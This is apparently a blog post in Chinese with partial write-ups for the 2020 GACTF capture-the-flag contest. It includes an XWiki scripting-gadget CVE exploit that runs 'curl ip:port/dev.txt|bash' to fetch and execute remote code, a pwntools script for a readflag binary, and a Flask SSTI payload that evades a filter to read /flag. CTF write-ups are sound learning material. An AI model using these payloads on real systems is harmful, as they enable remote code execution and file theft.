2020 GACTF 部分题解

发表于 分类于 阅读次数:

中午没休息随手看了几题。

Xwiki

CVE,参考https://jira.xwiki.org/browse/XWIKI-16960

  1. Create new user on xwiki.org (or myxwiki.org)
  2. Go to profile -> Edit -> My dashboard -> Add gadget
  3. Choose either python or groovy
  4. Paste following python/groovy code (for unix powered xwiki)

随手上了个 y1ng 师傅的车。

1
2
3
import os
print(os.popen("id").read())
print(os.popen("curl ip:port/dev.txt|bash").read())

readflag 和动态链接库整出来以后直接跑。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import *
context.log_level='debug'
io = process("./readflag")
flag = ""
while True:
    try:
        io.recvuntil("Which number is bigger?  ")
        a = int(io.recvuntil(":", drop=True))
        b = int(io.recvuntil("\n", drop=True))
        if a > b:
            io.sendline("0")
            flag += "0"
        else:
            io.sendline("1")
            flag += "1"
    except Exception as e:
        print(flag)
        exit()

# gactf{XWiki_CVE_without_permission_scripting_execution!!!}

simpleflask

ssti,过滤了逗号单引号空格和加号,还有 osflag 等,字符串拼接可以直接使用 "fl""ag" 绕过。

1
name={{"".__class__.__bases__[0].__subclasses__()[103].__init__.__globals__["open"]("/fl""ag").read()}}